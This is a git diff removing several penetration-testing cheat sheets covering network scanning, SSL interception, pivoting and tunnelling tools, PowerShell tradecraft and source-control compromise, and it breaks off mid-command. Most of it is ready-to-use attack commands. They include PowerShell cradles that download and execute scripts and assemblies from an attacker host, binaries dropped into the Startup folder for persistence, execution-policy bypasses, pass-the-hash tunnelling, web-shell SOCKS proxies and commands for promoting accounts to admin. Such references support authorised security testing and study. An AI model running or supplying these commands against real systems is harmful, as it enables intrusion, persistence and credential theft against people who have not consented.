proto smb -cmedb (test)(smb) > creds -cmedb (test)(smb) > export creds csv /tmp/creds -``` \ No newline at end of file diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md deleted file mode 100644 index b76dd23..0000000 --- a/Methodology and Resources/Network Discovery.md +++ /dev/null @@ -1,219 +0,0 @@ -# Network Discovery - -## Summary - -- [Nmap](#nmap) -- [Spyse](#spyse) -- [Masscan](#masscan) -- [Netdiscover](#netdiscover) -- [Responder](#responder) -- [Bettercap](#bettercap) -- [Reconnoitre](#reconnoitre) -- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl) -- [References](#references) - -## Nmap - -* Ping sweep (No port scan, No DNS resolution) - -```powershell -nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down" --sn : Disable port scanning. Host discovery only. --n : Never do DNS resolution -``` - -* Basic NMAP - -```bash -sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 -sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv - -• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports -• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000) -• 192.168.0.1 is the IP address to scan -• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE" -• -iL INPUTFILE tells Nmap to use the provided file as inputs -``` - -* CTF NMAP - -This configuration is enough to do a basic check for a CTF VM - -```bash -nmap -sV -sC -oA ~/nmap-initial 192.168.1.1 - --sV : Probe open ports to determine service/version info --sC : to enable the script --oA : to save the results - -After this quick command you can add "-p-" to run a full scan while you work with the previous result -``` - -* Aggressive NMAP - -```bash -nmap -A -T4 scanme.nmap.org -• -A: Enable OS detection, version detection, script scanning, and traceroute -• -T4: Defines the timing for the task (options are 0-5 and higher is faster) -``` - -* Using searchsploit to detect vulnerable services - -```bash -nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml -``` - -* Generating nice scan report - -```bash -nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html" -``` - -* NMAP Scripts - -```bash -nmap -sC : equivalent to --script=default - -nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap -PORT STATE SERVICE -80/tcp open http -| http-enum: -| /phpmyadmin/: phpMyAdmin -| /.git/HEAD: Git folder -| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' -|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' - -nmap --script smb-enum-users.nse -p 445 [target host] -Host script results: -| smb-enum-users: -| METASPLOITABLE\backup (RID: 1068) -| Full name: backup -| Flags: Account disabled, Normal user account -| METASPLOITABLE\bin (RID: 1004) -| Full name: bin -| Flags: Account disabled, Normal user account -| METASPLOITABLE\msfadmin (RID: 3000) -| Full name: msfadmin,,, -| Flags: Normal user account - -List Nmap scripts : ls /usr/share/nmap/scripts/ -``` - -## Spyse -* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/) - -* [Spyse Wrapper](https://github.com/zeropwn/spyse.py) - -#### Searching for subdomains -```bash -spyse -target xbox.com --subdomains -``` - -#### Reverse IP Lookup -```bash -spyse -target 52.14.144.171 --domains-on-ip -``` - -#### Searching for SSL certificates -```bash -spyse -target hotmail.com --ssl-certificates -``` -```bash -spyse -target "org: Microsoft" --ssl-certificates -``` -#### Getting all DNS records -```bash -spyse -target xbox.com --dns-all -``` - -## Masscan - -```powershell -masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out -masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 - -# find machines on the network -sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp -cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst - -# find open ports for one machine -sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst - - -# TCP grab banners and services information -TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1) -[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP - -# UDP grab banners and services information -UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1) -[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP -``` - -## Reconnoitre - -Dependencies: - -* nbtscan -* nmap - -```powershell -python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostnames --services --quick -``` - -If you have a segfault with nbtscan, read the following quote. -> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255 - -## Netdiscover - -```powershell -netdiscover -i eth0 -r 192.168.1.0/24 -Currently scanning: Finished! | Screen View: Unique Hosts - -20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876 -_____________________________________________________________________________ -IP At MAC Address Count Len MAC Vendor / Hostname ------------------------------------------------------------------------------ -192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom -192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor -192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc. -192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD -``` - -## Responder - -```powershell -responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding. -responder.py -I eth0 -wrf -``` - -Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows) - -## Bettercap - -```powershell -bettercap -X --proxy --proxy-https -T -# better cap in spoofing, discovery, sniffer -# intercepting http and https requests, -# targetting specific IP only -``` - -## SSL MITM with OpenSSL -This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl. -If you can modify `/etc/hosts` of the client: -```powershell -sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts # On client host -``` -On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server): -```powershell -openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem -``` -On our MITM server, we setup our infra: -```powershell -mkfifo response -sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response -``` -In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example. - -## References - -* [TODO](TODO) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md deleted file mode 100644 index 11669b6..0000000 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ /dev/null @@ -1,503 +0,0 @@ -# Network Pivoting Techniques - -## Summary - -* [SOCKS Compatibility Table](#socks-compatibility-table) -* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding) -* [SSH](#ssh) - * [SOCKS Proxy](#socks-proxy) - * [Local Port Forwarding](#local-port-forwarding) - * [Remote Port Forwarding](#remote-port-forwarding) -* [Proxychains](#proxychains) -* [Graftcp](#graftcp) -* [Web SOCKS - reGeorg](#web-socks---regeorg) -* [Web SOCKS - pivotnacci](#web-socks---pivotnacci) -* [Metasploit](#metasploit) -* [sshuttle](#sshuttle) -* [chisel](#chisel) - * [SharpChisel](#sharpchisel) -* [gost](#gost) -* [Rpivot](#rpivot) -* [RevSocks](#revsocks) -* [plink](#plink) -* [ngrok](#ngrok) -* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools) -* [Basic Pivoting Types](#basic-pivoting-types) - * [Listen - Listen](#listen---listen) - * [Listen - Connect](#listen---connect) - * [Connect - Connect](#connect---connect) -* [References](#references) - - -## SOCKS Compatibility Table - -| SOCKS Version | TCP | UDP | IPv4 | IPv6 | Hostname | -| ------------- | :---: | :---: | :---: | :---: | :---: | -| SOCKS v4 | ✅ | ❌ | ✅ | ❌ | ❌ | -| SOCKS v4a | ✅ | ❌ | ✅ | ❌ | ✅ | -| SOCKS v5 | ✅ | ✅ | ✅ | ✅ | ✅ | - - -## Windows netsh Port Forwarding - -```powershell -netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport -netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 - -# Forward the port 4545 for the reverse shell, and the 80 for the http server for example -netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545 -netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80 -# Correctly open the port on the machine -netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80 -netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80 -netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545 -netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545 - -``` - -1. listenaddress – is a local IP address waiting for a connection. -2. listenport – local listening TCP port (the connection is waited on it). -3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected. -4. connectport – is a TCP port to which the connection from listenport is forwarded to. - -## SSH - -### SOCKS Proxy - -```bash -ssh -D8080 [user]@[host] - -ssh -N -f -D 9000 [user]@[host] --f : ssh in background --N : do not execute a remote command -``` - -Cool Tip : Konami SSH Port forwarding - -```bash -[ENTER] + [~C] --D 1090 -``` - -### Local Port Forwarding - -```bash -ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host] -``` - -### Remote Port Forwarding - -```bash -ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host] -ssh -R 3389:10.1.1.224:3389 root@10.11.0.32 -``` - -## Proxychains - -**Config file**: /etc/proxychains.conf - -```bash -[ProxyList] -socks4 localhost 8080 -``` - -Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6` - -## Graftcp - -> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy. - -:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications. - -```ps1 -# https://github.com/hmgle/graftcp - -# Create a SOCKS5, using Chisel or another tool and forward it through SSH -(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS -(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse -(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks - -# Run graftcp and specify the SOCKS5 -(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080 -(attacker) $ graftcp ./nuclei -u http://172.16.1.24 -``` - -Simple configuration file for graftcp - -```py -# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf -## Listen address (default ":2233") -listen = :2233 -loglevel = 1 - -## SOCKS5 address (default "127.0.0.1:1080") -socks5 = 127.0.0.1:1080 -# socks5_username = SOCKS5USERNAME -# socks5_password = SOCKS5PASSWORD - -## Set the mode for select a proxy (default "auto") -select_proxy_mode = auto -``` - - -## Web SOCKS - reGeorg - -[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. - -Drop one of the following files on the server: - -- tunnel.ashx -- tunnel.aspx -- tunnel.js -- tunnel.jsp -- tunnel.nosocket.php -- tunnel.php -- tunnel.tomcat.5.jsp - -```python -python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080 - -optional arguments: - -h, --help show this help message and exit - -l , --listen-on The default listening address - -p , --listen-port The default listening port - -r , --read-buff Local read buffer, max data to be sent per POST - -u , --url The url containing the tunnel script - -v , --verbose Verbose output[INFO|DEBUG] -``` - -## Web SOCKS - pivotnacci - -[pivotnacci](https://github.com/blackarrowsec/pivotnacci), a tool to make socks connections through HTTP agents. - -```powershell -pip3 install pivotnacci -pivotnacci https://domain.com/agent.php --password "s3cr3t" -pivotnacci https://domain.com/agent.php --polling-interval 2000 -``` - - -## Metasploit - -```powershell -# Meterpreter list active port forwards -portfwd list - -# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell -portfwd add –l 3389 –p 3389 –r target-host -portfwd add -l 88 -p 88 -r 127.0.0.1 -portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 - -# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell -portfwd delete –l 3389 –p 3389 –r target-host -# Meterpreter delete all port forwards -portfwd flush - -or - -# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 -run autoroute -s 192.168.15.0/24 -use auxiliary/server/socks_proxy -set SRVPORT 9090 -set VERSION 4a -# or -use auxiliary/server/socks4a # (deprecated) - - -# Meterpreter list all active routes -run autoroute -p - -route #Meterpreter view available networks the compromised host can access -# Meterpreter add route for 192.168.14.0/24 via Session number. -route add 192.168.14.0 255.255.255.0 3 -# Meterpreter delete route for 192.168.14.0/24 via Session number. -route delete 192.168.14.0 255.255.255.0 3 -# Meterpreter delete all routes -route flush -``` - -## Empire - -```powershell -(Empire) > socksproxyserver -(Empire) > use module management/invoke_socksproxy -(Empire) > set remoteHost 10.10.10.10 -(Empire) > run -``` - -## sshuttle - -Transparent proxy server that works as a poor man's VPN. Forwards over ssh. - -* Doesn't require admin. -* Works with Linux and MacOS. -* Supports DNS tunneling. - -```powershell -pacman -Sy sshuttle -apt-get install sshuttle -sshuttle -vvr user@10.10.10.10 10.1.1.0/24 -sshuttle -vvr username@pivot_host 10.2.2.0/24 - -# using a private key -$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" - -# -x == exclude some network to not transmit over the tunnel -# -x x.x.x.x.x/24 -``` - -## chisel - - -```powershell -go get -v github.com/jpillora/chisel - -# forward port 389 and 88 to hacker computer -user@hacker$ /opt/chisel/chisel server -p 8008 --reverse -user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 - -# SOCKS -user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks -``` - -### SharpChisel - -A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel - -```powershell -user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com" -================================================================ -server : run the Server Component of chisel --p 8080 : run server on port 8080 ---key "private": use "private" string to seed the generation of a ECDSA public and private key pair ---auth "user:pass" : Creds required to connect to the server ---reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes. ---proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight. - -user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks -``` - -## Ligolo - -Ligolo : Reverse Tunneling made easy for pentesters, by pentesters - - -1. Build Ligolo - ```powershell - # Get Ligolo and dependencies - cd `go env GOPATH`/src - git clone https://github.com/sysdream/ligolo - cd ligolo - make dep - - # Generate self-signed TLS certificates (will be placed in the certs folder) - make certs TLS_HOST=example.com - - make build-all - ``` -2. Use Ligolo - ```powershell - # On your attack server. - ./bin/localrelay_linux_amd64 - - # On the compromise host. - ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555 - ``` - -## Gost - -> Wiki English : https://docs.ginuerzh.xyz/gost/en/ - -```powershell -git clone https://github.com/ginuerzh/gost -cd gost/cmd/gost -go build - -# Socks5 Proxy -Server side: gost -L=socks5://:1080 -Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true - -# Local Port Forward -gost -L=tcp://:2222/192.168.1.1:22 [-F=..] -``` - -## Rpivot - -Server (Attacker box) - -```python -python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0 -``` - -Client (Compromised box) - -```python -python client.py --server-ip --server-port 9443 -``` - -Through corporate proxy - -```python -python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ ---ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e -``` - -Passing the hash - -```python -python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ ---ntlm-proxy-port 8080 --domain CORP --username jdoe \ ---hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE -``` - -## revsocks - -```powershell -# Listen on the server and create a SOCKS 5 proxy on port 1080 -user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234 - -# Connect client to the server -user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10" -``` - - -```powershell -# Build for Linux -git clone https://github.com/kost/revsocks -export GOPATH=~/go -go get github.com/hashicorp/yamux -go get github.com/armon/go-socks5 -go get github.com/kost/go-ntlmssp -go build -go build -ldflags="-s -w" && upx --brute revsocks - -# Build for Windows -go get github.com/hashicorp/yamux -go get github.com/armon/go-socks5 -go get github.com/kost/go-ntlmssp -GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -go build -ldflags -H=windowsgui -upx revsocks -``` - - -## plink - -```powershell -# exposes the SMB port of the machine in the port 445 of the SSH Server -plink -l root -pw toor -R 445:127.0.0.1:445 -# exposes the RDP port of the machine in the port 3390 of the SSH Server -plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 - -plink -l root -pw mypassword 192.168.18.84 -R -plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445 - -plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] -# redirects the Windows port 445 to Kali on port 22 -plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185 -``` - -## ngrok - -```powershell -# get the binary -wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip -unzip ngrok-stable-linux-amd64.zip - -# log into the service -./ngrok authtoken 3U[REDACTED_TOKEN]Hm - -# deploy a port forwarding for 4433 -./ngrok http 4433 -./ngrok tcp 4433 -``` - -## cloudflared - -```bash -# Get the binary -wget https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.tgz -tar xvzf cloudflared-stable-linux-amd64.tgz -# Expose accessible internal service to the internet -./cloudflared tunnel --url ://: -``` - -## Capture a network trace with builtin tools - -* Windows (netsh) - ```ps1 - # start a capture use the netsh command. - netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384 - - # stop the trace - netsh trace stop - - # Event tracing can be also used across a reboots - netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384 - - # To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version. - etl2pcapng.exe c:\trace.etl c:\trace.pcapng - - # Use filters - netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384 - ``` -* Linux (tcpdump) - ```ps1 - sudo apt-get install tcpdump - tcpdump -w 0001.pcap -i eth0 - tcpdump -A -i eth0 - - # capture every TCP packet - tcpdump -i eth0 tcp - - # capture everything on port 22 - tcpdump -i eth0 port 22 - ``` - - -## Basic Pivoting Types - -| Type | Use Case | -| :------------- | :------------------------------------------ | -| Listen - Listen | Exposed asset, may not want to connect out. | -| Listen - Connect | Normal redirect. | -| Connect - Connect | Can’t bind, so connect to bridge two hosts | - -### Listen - Listen - -| Type | Use Case | -| :------------- | :------------------------------------------ | -| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`| -| socat | `socat -v tcp-listen:8080 tcp-listen:9090` | -| remote host 1 | `ncat localhost 8080 < file` | -| remote host 2 | `ncat localhost 9090 > newfile` | - -### Listen - Connect - -| Type | Use Case | -| :------------- | :------------------------------------------ | -| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` | -| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` | -| remote host 1 | `ncat localhost -p 8080 < file` | -| remote host 2 | `ncat -l -p 9090 > newfile` | - -### Connect - Connect - -| Type | Use Case | -| :------------- | :------------------------------------------ | -| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` | -| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` | -| remote host 1 | `ncat -l -p 8080 < file` | -| remote host 2 | `ncat -l -p 9090 > newfile` | - -## References - -* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) -* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) -* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) -* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) -* 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/) -* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) -* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory) -* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/) \ No newline at end of file diff --git a/Methodology and Resources/Powershell - Cheatsheet.md b/Methodology and Resources/Powershell - Cheatsheet.md deleted file mode 100644 index 9d64f1f..0000000 --- a/Methodology and Resources/Powershell - Cheatsheet.md +++ /dev/null @@ -1,110 +0,0 @@ -# Powershell - -## Summary - -* Execution Policy -* Encoded Commands -* Download file -* Load Powershell scripts -* Load C# assembly reflectively -* Secure String to Plaintext -* References - -## Execution Policy - -```ps1 -powershell -EncodedCommand $encodedCommand -powershell -ep bypass ./PowerView.ps1 - -# Change execution policy -Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted -Set-ExecutionPolicy Bypass -Scope Process -``` - -## Constrained Mode - -```ps1 -# Check if we are in a constrained mode -# Values could be: FullLanguage or ConstrainedLanguage -$ExecutionContext.SessionState.LanguageMode - -## Bypass -powershell -version 2 -``` - -## Encoded Commands - -* Windows - ```ps1 - $command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' - $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) - $encodedCommand = [Convert]::ToBase64String($bytes) - ``` -* Linux: :warning: UTF-16LE encoding is required - ```ps1 - echo 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' | iconv -t utf-16le | base64 -w 0 - ``` - -## Download file - -```ps1 -# Any version -(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerView.ps1", "C:\Windows\Temp\PowerView.ps1") -wget "http://10.10.10.10/taskkill.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" -Import-Module BitsTransfer; Start-BitsTransfer -Source $url -Destination $output - -# Powershell 4+ -IWR "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" -Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" -``` - -## Load Powershell scripts - -```ps1 -# Proxy-aware -IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') -echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') | powershell -noprofile - -powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.10.10/PowerView.ps1')|iex" - -# Non-proxy aware -$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.10.10/PowerView.ps1',$false);$h.send();iex $h.responseText -``` - -## Load C# assembly reflectively - -```powershell -# Download and run assembly without arguments -$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe') -$assem = [System.Reflection.Assembly]::Load($data) -[rev.Program]::Main() - -# Download and run Rubeus, with arguments (make sure to split the args) -$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe') -$assem = [System.Reflection.Assembly]::Load($data) -[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) - -# Execute a specific method from an assembly (e.g. a DLL) -$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll') -$assem = [System.Reflection.Assembly]::Load($data) -$class = $assem.GetType("ClassLibrary1.Class1") -$method = $class.GetMethod("runner") -$method.Invoke(0, $null) -``` - -## Secure String to Plaintext - -```ps1 -$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring -$user = "HTB\Tom" -$cred = New-Object System.management.Automation.PSCredential($user, $pass) -$cred.GetNetworkCredential() | fl -UserName : Tom -Password : 1ts-mag1c!!! -SecurePassword : System.Security.SecureString -Domain : HTB -``` - -## References - -* [Windows & Active Directory Exploitation Cheat Sheet and Command Reference - @chvancooten](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) -* [Basic PowerShell for Pentesters - HackTricks](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters) \ No newline at end of file diff --git a/Methodology and Resources/Source Code Management.md b/Methodology and Resources/Source Code Management.md deleted file mode 100644 index 6a450b0..0000000 --- a/Methodology and Resources/Source Code Management.md +++ /dev/null @@ -1,133 +0,0 @@ -# Source Code Management & CI/CD Compromise - -> - -## Summary - -* [Tools](#tools) -* [Enumerate repositories files and secrets](#enumerate-repositories-files-and-secrets) -* [Personal Access Token](#personal-access-token) -* [Gitlab CI/Github Actions](#gitlab-cigithub-actions) -* [References](#references) - - -## Tools - -* [synacktiv/nord-stream](https://github.com/synacktiv/nord-stream) - List the secrets stored inside CI/CD environments and extract them by deploying malicious pipelines -* [xforcered/SCMKit](https://github.com/xforcered/SCMKit) - Source Code Management Attack Toolkit - - -## Enumerate repositories files and secrets - -Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforcered/SCMKit) - -* Discover repositories being used in a particular SCM system - ```ps1 - SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local - SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local - ``` -* Search for repositories by repository name in a particular SCM system - ```ps1 - SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term" - SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term" - ``` -* Search for code containing a given keyword in a particular SCM system - ```ps1 - SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term" - SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term" - ``` -* Search for files in repositories containing a given keyword in the file name in a particular SCM system - ```ps1 - SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term" - SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term" - ``` -* List snippets owned by the current user in GitLab - ```ps1 - SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local - SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local - ``` -* List all GitLab runners available to the current user in GitLab - ```ps1 - SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local - SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local - ``` -* Get the assigned privileges to an access token being used in a particular SCM system - ```ps1 - SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local - ``` -* Promote a normal user to an administrative role in a particular SCM system - ```ps1 - SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName - SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName - SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName - ``` -* Create/List/Delete an access token to be used in a particular SCM system - ```ps1 - SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName - SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName - SCMKit.exe -s gitlab -m removepat -c userName:password -u 